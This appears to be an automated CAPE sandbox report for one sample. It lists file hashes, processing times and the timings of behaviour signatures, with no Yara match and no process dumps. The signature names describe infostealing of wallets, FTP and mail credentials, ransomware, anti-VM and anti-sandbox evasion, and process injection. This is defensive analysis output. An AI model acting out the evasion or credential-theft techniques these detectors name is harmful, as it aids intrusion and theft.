SHA256 403a8db5d760dbd338edb4249d10f013e554ff266dc1fa3c1f0370880a11e4d6
CRC32 CAF60D40
Ssdeep 48:6feL5KyHZxOUWfKkxk/I4frTWlkMbZlO3gicgThlGug8CnN2vuY/XNYBj2U3BD5G:62/TkfKkxyr+kMN/g/GN9NYMNhy
Yara None matched
CAPE Yara None matched
Sorry! No process dumps.

Processing ( 10.621 seconds )

  • 5.11 CAPE
  • 1.391 Dropped
  • 1.388 TargetInfo
  • 1.385 BehaviorAnalysis
  • 1.124 Static
  • 0.103 TrID
  • 0.051 Strings
  • 0.032 NetworkAnalysis
  • 0.031 Deduplicate
  • 0.005 AnalysisInfo
  • 0.001 Debug

Signatures ( 0.423 seconds )

  • 0.081 api_spamming
  • 0.062 NewtWire Behavior
  • 0.062 decoy_document
  • 0.022 antivm_vbox_libs
  • 0.015 antiav_detectreg
  • 0.014 antiav_detectfile
  • 0.011 stealth_file
  • 0.01 infostealer_bitcoin
  • 0.01 infostealer_ftp
  • 0.009 exec_crash
  • 0.008 antiav_avast_libs
  • 0.008 ransomware_files
  • 0.006 exploit_getbasekerneladdress
  • 0.006 exploit_gethaldispatchtable
  • 0.006 antivm_vbox_files
  • 0.006 infostealer_im
  • 0.005 antivm_vmware_libs
  • 0.005 antisandbox_sunbelt_libs
  • 0.005 antisandbox_sboxie_libs
  • 0.005 masquerade_process_name
  • 0.004 malicious_dynamic_function_loading
  • 0.004 antiav_bitdefender_libs
  • 0.004 infostealer_mail
  • 0.003 Doppelganging
  • 0.003 regsvr32_squiblydoo_dll_load
  • 0.003 dynamic_function_loading
  • 0.003 persistence_autorun
  • 0.003 antianalysis_detectfile
  • 0.003 antianalysis_detectreg
  • 0.003 ransomware_extensions
  • 0.002 betabot_behavior
  • 0.002 stealth_timeout
  • 0.002 antidbg_devices
  • 0.002 geodo_banking_trojan
  • 0.002 browser_security
  • 0.001 tinba_behavior
  • 0.001 hawkeye_behavior
  • 0.001 network_tor
  • 0.001 rat_nanocore
  • 0.001 dridex_behavior
  • 0.001 injection_createremotethread
  • 0.001 antivm_generic_services
  • 0.001 antisandbox_sleep
  • 0.001 mimics_filetime
  • 0.001 kazybot_behavior
  • 0.001 InjectionCreateRemoteThread
  • 0.001 kibex_behavior
  • 0.001 antivm_generic_scsi
  • 0.001 antivm_generic_disk
  • 0.001 cerber_behavior
  • 0.001 virus
  • 0.001 antivm_parallels_keys
  • 0.001 antivm_vbox_devices
  • 0.001 antivm_vbox_keys
  • 0.001 antivm_vmware_files
  • 0.001 antivm_vmware_keys
  • 0.001 codelux_behavior
  • 0.001 disables_browser_warn
  • 0.001 rat_pcclient

Reporting ( 0.005 seconds )

  • 0.005 CompressResults
Task ID 121555
Mongo ID 5e1dde0ea21c7f1a1b4810a7
Cuckoo release 1.3-CAPE